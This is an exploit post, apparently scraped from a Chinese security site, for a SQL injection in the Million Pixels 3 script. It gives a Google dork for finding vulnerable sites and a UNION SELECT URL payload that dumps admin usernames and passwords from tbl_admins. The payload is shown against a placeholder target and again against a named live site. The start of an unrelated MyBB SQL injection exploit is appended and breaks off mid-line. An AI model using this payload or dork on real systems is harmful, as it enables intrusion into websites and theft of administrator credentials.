Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
所属分类:
网络安全 / Exploit
阅读数:
117
收藏 0赞 0分享
#################################################################
#
# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
#
#========================================================
# =
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
# =
#========================================================
#
# script : http://e-topbiz.com/oprema/pages/millionpixels3.php
#
# DorK : inurl: "tops_top.php? id_cat ="
#################################################################
Exploit:
www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*
L!VE DEMO:
http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*
########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################
Im IRAQi
MyBulletinBoard (MyBB)
<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
收藏 0赞 0分享
